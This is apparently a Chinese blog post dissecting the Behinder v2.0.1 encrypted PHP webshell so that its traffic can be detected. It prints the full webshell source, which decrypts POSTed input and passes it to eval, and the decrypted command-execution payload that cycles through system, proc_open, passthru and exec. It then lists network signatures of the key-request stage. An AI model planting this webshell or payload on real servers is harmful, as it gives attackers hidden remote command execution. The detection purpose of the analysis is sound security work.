冰蝎php木马修改,冰蝎动态二进制加密WebShell的检测

最新推荐文章于 2024-03-17 09:46:12 发布
最新推荐文章于 2024-03-17 09:46:12 发布
阅读量2.4k 收藏 3
点赞数
文章标签: 冰蝎php木马修改

中国菜刀等工具管理WebShell的时候会有一些固定的特征,容易被waf或者IPS检测到,最近1年出来了个动态加密的WebShell管理工具,给检测带来了一定的困难,所以写个文章简单解剖一下

注:本文只针对当前的最新版冰蝎(Behinder) v2.0.1,以php webshell为例,其他webshell只是有细微的差别,有兴趣可以自行研究

实验环境客户端: windows 7 + 冰蝎(Behinder) v2.0.1

服务端:ubuntu 16.04 + apache + php

webshell文件分析

以php为例

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33<?php

@error_reporting(0);

session_start();

if (isset($_GET['pass']))

{

$key=substr(md5(uniqid(rand())),16);

$_SESSION['k']=$key;

print $key;

}

else

{

$key=$_SESSION['k'];

$post=file_get_contents("php://input");

if(!extension_loaded('openssl'))

{

$t="base64_"."decode";

$post=$t($post."");

for($i=0;$i

$post[$i] = $post[$i]^$key[$i+1&15];

}

}

else

{

$post=openssl_decrypt($post, "AES128", $key);

}

$arr=explode('|',$post);

$func=$arr[0];

$params=$arr[1];

class C{public function __construct($p) {eval($p."");}}

@new C($params);

}

?>

其实就两个功能

1、首先存在pass参数的情况(其实这个就是通常所说的一句话木马),就是通过截取随机数的md5的高16位作为密钥,保存在服务器的全局 $_SESSION变量中,同时打印出来,这样客户端接收到就可以用这个密钥进行通信了

2、假如不带参数,就是加密通信的过程。假如php不存在openssl这个extension,就是用base64解码后,使用key进行循环异或解密。而存在openssl就使用AES128进行解密

基于上面分析可以得到通信流程

20dee3389e557236588c13d2c14b5409.png

下面我们看看实际通信流量

数据包分析

通过在服务器上传webshell,客户端连接后通过wireshark抓取数据包

ac520b521d3f87d5fadd47b4e4df9765.png

可以看到请求了两次密钥才开始真正的POST通信

接下来的通信,就是AES128加密后的base64密文

250040582fc732618f653860d56ad35a.png

所以我们检测只能从请求密钥阶段入手了

通过获取密钥的数据包,我们发现以下特征

1、使用GET方法

2、参数名即木马的密码(这个可以修改,不能作为特征),但是参数值为纯数字可以作为特征,暂时来看应该1到5位数字可以匹配到了,保险一点可以1-8都可以

3、请求中有HEADER字段:Content-type: application/x-www-form-urlencoded

4、响应中会有Content-Length: 16

5、当然响应的body肯定也是16长度,而且字符是16进制的字符,即[0-9a-f]

通信过程实际发送的payload

通过在webshell中加入如下代码,即可获得解密后的payload

44465e1a92c9fac77e648e484b0bb1fd.png

获得的如下:(由于base64_decode后面的比较长所以省略了)

1assert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCg0KZnVuY..............................'));

所以它就是将字符串base64解密之后通过eval执行

解码上面的base64串得到下面真正的代码(下面是以命令执行为例的代码)

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105@error_reporting(0);

function getSafeStr($str){

$s1 = iconv('utf-8','gbk//IGNORE',$str);

$s0 = iconv('gbk','utf-8//IGNORE',$s1);

if($s0 == $str){

return $s0;

}else{

return iconv('gbk','utf-8//IGNORE',$str);

}

}

function main($cmd)

{

@set_time_limit(0);

@ignore_user_abort(1);

@ini_set('max_execution_time', 0);

$result = array();

$PadtJn = @ini_get('disable_functions');

if (! empty($PadtJn)) {

$PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);

$PadtJn = explode(',', $PadtJn);

$PadtJn = array_map('trim', $PadtJn);

} else {

$PadtJn = array();

}

$c = $cmd;

if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {

$c = $c . " 2>&1\n";

}

$JueQDBH = 'is_callable';

$Bvce = 'in_array';

if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {

ob_start();

system($c);

$kWJW = ob_get_contents();

ob_end_clean();

} else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {

$handle = proc_open($c, array(

array(

'pipe',

'r'

),

array(

'pipe',

'w'

),

array(

'pipe',

'w'

)

), $pipes);

$kWJW = NULL;

while (! feof($pipes[1])) {

$kWJW .= fread($pipes[1], 1024);

}

@proc_close($handle);

} else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {

ob_start();

passthru($c);

$kWJW = ob_get_contents();

ob_end_clean();

} else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {

$kWJW = shell_exec($c);

} else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {

$kWJW = array();

exec($c, $kWJW);

$kWJW = join(chr(10), $kWJW) . chr(10);

} else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {

$fp = popen($c, 'r');

$kWJW = NULL;

if (is_resource($fp)) {

while (! feof($fp)) {

$kWJW .= fread($fp, 1024);

}

}

@pclose($fp);

} else {

$kWJW = 0;

$result["status"] = base64_encode("fail");

$result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");

$key = $_SESSION['k'];

echo encrypt(json_encode($result), $key);

return;

}

$result["status"] = base64_encode("success");

$result["msg"] = base64_encode(getSafeStr($kWJW));

echo encrypt(json_encode($result), $_SESSION['k']);

}

function encrypt($data,$key)

{

if(!extension_loaded('openssl'))

{

for($i=0;$i

$data[$i] = $data[$i]^$key[$i+1&15];

}

return $data;

}

else

{

return openssl_encrypt($data, "AES128", $key);

}

}$cmd="whoami";

main($cmd);

可以看到考虑了编码问题,还有一些执行命令的函数被禁用的问题

最后输出结构也是AES128加密的

工具每次只需倒数第二行的$cmd即可更换要执行的命令

总结

攻防是不断对抗升级的,冰蝎虽然通信过程加密,但是请求密钥阶段有很多特征,假如将请求密钥阶段特征抹掉,那么我们防御端会更加难以检查。

落步惊风
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
冰蝎v2.1动态二进制加密网站管理客户端
06-12
冰蝎动态二进制加密网站管理客户端 客户端:jre6~jre8 运行命令:java -jar Behinder.jar macOs:java -XstartOnFirstThread -jar Behinder.jar
常见webshell流量分析
学生
06-27 1228
鐜鍙橀噺:
php后门木马常用命令分析与防范
主题模板站的博客
01-21 690
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
qq_53058639的博客
03-17 425
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。?
html5上传文件怎么加密,javascript – 如何使用HTML5 File API加密二进制文件并上传到服务器...
weixin_36035900的博客
06-05 364
我需要使用HTML5 FileReader API和CryptoJS加密并上传文件到Apache / PHP服务器我成功完成了以下工作>使用FileReader API读取文件>使用readAsDataURL()函数将文件转换为base64>使用以下内容加密它CryptoJS.AES.encrypt(e.target.result,密码);但我无法将其作为File对象发送到服务器...
Kali渗透测试之DVWA系列3——命令执行漏洞
浅浅的博客
05-11 2634
一、命令执行漏洞 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内就好比说一句话木马<?php @eval($_POST[cmd]);?> 二、分类 1、代码过滤不严或无过滤 2、系统漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会影响到bash交互的多种应用,例如:http、ssh、dhcp等 3、调用第三方组件,例如...
Linux维护安全-PHP安全-php高危函数禁用-php必需禁用的最高危函数总结-必禁
一颗优雅草科技-央千澈的CSDN博客~只想无穷无尽的学习~
05-18 765
Linux维护安全-PHP安全-php高危函数禁用-php必需禁用的最高危函数总结,优雅草松鼠蜻蜓系统安装必须开启proc_open,putenv,但是希望大家在安装完成后一定要禁用。必须禁用的高危函数:putenv。
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
C20220511的博客
07-19 2026
本文基于冰蝎Behinder_v3.0.11和哥斯拉v4.00-godzilla,对它们的加解密方式进行识别和分析【附简易解密脚本】,希望能在行动中助大家一臂之力。
解决:shell_exec()无法使用,shell_exec()被禁用
weixin_34406061的博客
12-27 6704
文章来源:https://www.onepound.cn/yc/?p=9257 最近刚买了一个新空间,网站上线后发现总是出现以下警告: Warning: shell_exec() has been disabled for security reasons in/home/shoesnba/public_html/redsoleshoeses.com/includes/function...
PHP中执行系统命令(绕过disable_functions)
谢公子的博客
03-07 4369
PHP中执行系统命令 在PHP中,执行系统命令,有以下方式或方法: exec() shell_exec() system() passthru() popen() proc_open() pcntl_exec() :需要开启pcntl扩展 COM组件:Wscript.ShellShell.Application dl():通过加载自定义php扩展突破 disable_fucn...
WebShell工具特征流量分析合集
爱吃仡坨的Blog
10-25 1478
通过编码的数据包1特征,发现是URL编码(BP会自动对其解码显示)还可以通过解码网站对其进行解码,之后分析数据包特征如下图,发现通过蚁剑终端传参之后得到的响应包任然是明文的。
PHP执行系统命令函数
热门推荐
Au
03-24 2万+
命令注入 命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻击手段。 常见的执行系统命令的函数有 system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() system()...
冰蝎webshell,
08-18
在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 主要的事情说三遍
强大的webshell管理工具——冰蝎
12-26
只有适合自己的工具,没有好坏之分,请免费拿走。
冰蝎V4.1Behinder
03-11
冰蝎V4.1Behinder
冰蝎2.0-密码123qaz.rar
10-17
冰蝎webshell,无毒,无后门,安全学习可放心使用,技术含量较低主要简单操作。为防止杀毒软件误杀,已设置密码123qaz
后端开发是一个涉及广泛技术和工具的领域.docx
最新发布
04-30
后端开发是一个涉及广泛技术和工具的领域,这些资源对于构建健壮、可扩展和高效的Web应用程序至关重要。以下是对后端开发资源的简要介绍: 首先,掌握一门或多门编程语言是后端开发的基础。Java、Python和Node.js是其中最受欢迎的几种。Java以其跨平台性和丰富的库而著名,Python则因其简洁的语法和广泛的应用领域而备受欢迎。Node.js则通过其基于JavaScript的单线程异步I/O模型,为Web开发提供了高性能的解决方案。 其次,数据库技术是后端开发中不可或缺的一部分。关系型数据库(如MySQL、PostgreSQL)和非关系型数据库(如MongoDB、Redis)各有其特点和应用场景。关系型数据库适合存储结构化数据,而非关系型数据库则更适合处理大量非结构化数据。 此外,Web开发框架也是后端开发的重要资源。例如,Express是一个基于Node.js的Web应用开发框架,它提供了丰富的API和中间件支持,使得开发人员能够快速地构建Web应用程序。Django则是一个用Python编写的Web应用框架,它采用了MVC的软件设计模式,使得代码结构更加清晰和易于维护。
华为数字化转型实践28个精华问答glkm.pptx
04-30
华为数字化转型实践28个精华问答glkm.pptx
新员工入职培训全流程资料包gl.zip
04-30
新员工入职培训全流程资料包(100+个文件) 1入职流程指引 万科新职员入职通知书 万科新职员入职引导手册 新进员工跟进管理表 新员工入职报到工作单(文职) 新员工入职报到流程 新员工入职流程表 新员工入职手续办理流程(工厂 新员工入职手续清单 新员工入职须知 新员工入职训流程 新员工入职引导表(导师用) 2 入职工具表格 3 培训方案计划 4培训管理流程 5培训教材课件 6 培训效果检测 7 员工管理制度 8 劳动合同协议 9 新员工培训PPT模板(28套)
如何识别冰蝎webshell文件
07-14
识别冰蝎冰蝎RAT)Webshell 文件可以是一项复杂的任务,因为这种 Webshell 文件通常会采用各种隐蔽和加密技术来逃避检测。以下是一些常见的方法和指南,可用于帮助识别冰蝎 Webshell 文件: 1. 文件名和路径:冰蝎 Webshell 文件通常会使用伪装性强的文件名和路径,以掩盖其真实用途。一些常见的文件名可能包括类似于 "index.php.bak" 或 "config.php.bak" 的后缀。 2. 文件内容:冰蝎 Webshell 文件的内容通常会包含加密、编码或混淆的代码。这些代码可能会使用变量替换、字符串拼接等技术来隐藏其真实功能。您可以检查文件内容中是否存在可疑的、与正常网页文件不符合的代码段。 3. HTTP 请求特征:冰蝎 Webshell 文件通常通过 HTTP 协议与远程控制服务器通信。您可以检查文件中是否存在与远程控制服务器通信相关的特征,如特定的 URL、POST 或 GET 请求等。 4. 常见指纹:冰蝎 Webshell 是一种常见的 Webshell 类型,有许多安全工具和脚本可以帮助您识别这种类型的 Webshell。例如,一些Webshell扫描器可以通过检查文件的特定特征或指纹来识别冰蝎 Webshell 文件。 5. 安全工具:使用安全工具进行扫描和检测,如安全防护软件、Web应用程序防火墙(WAF)等。这些工具可以帮助您自动检测和识别冰蝎 Webshell 文件。 除了上述方法,还有许多其他技术和工具可用于识别冰蝎 Webshell 文件。然而,鉴于冰蝎 Webshell 的变种和不断演变,没有一种方法可以完全保证识别所有的冰蝎 Webshell。因此,如果您怀疑系统中存在冰蝎 Webshell 文件,最好寻求专业的安全专家或安全团队的帮助来进行详细的分析和处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值